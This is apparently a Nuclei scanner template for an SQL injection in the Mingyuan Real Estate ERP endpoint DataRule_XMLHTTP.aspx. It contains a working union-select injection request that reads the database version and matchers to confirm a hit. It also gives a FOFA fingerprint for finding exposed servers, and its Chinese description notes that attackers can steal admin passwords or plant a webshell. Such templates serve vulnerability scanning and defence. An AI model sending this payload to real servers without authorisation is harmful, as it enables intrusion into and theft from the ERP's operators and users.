http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - Microsoft SQL Server
            - text=
            - value=
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /BUAdjust/DataRule/DataRule_XMLHTTP.aspx/?ywtype=getFieldXML&table=-1%27%20union%20select%20@@version-- HTTP/1.1
          Host: {{Hostname}}
id: mingyuandichanERP-DataRule_XMLHTTP_aspx-sql
info:
    author: Superhero
    description: |-
        fofa: body="/_common/scripts/md5-min.js"
        明源地产ERP DataRule_XMLHTTP.aspx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 明源地产ERP DataRule_XMLHTTP.aspx SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/mKP1jGK4QGf1ZPeCEBxgzQ
    severity: high
    tags:
        - 明源地产ERP
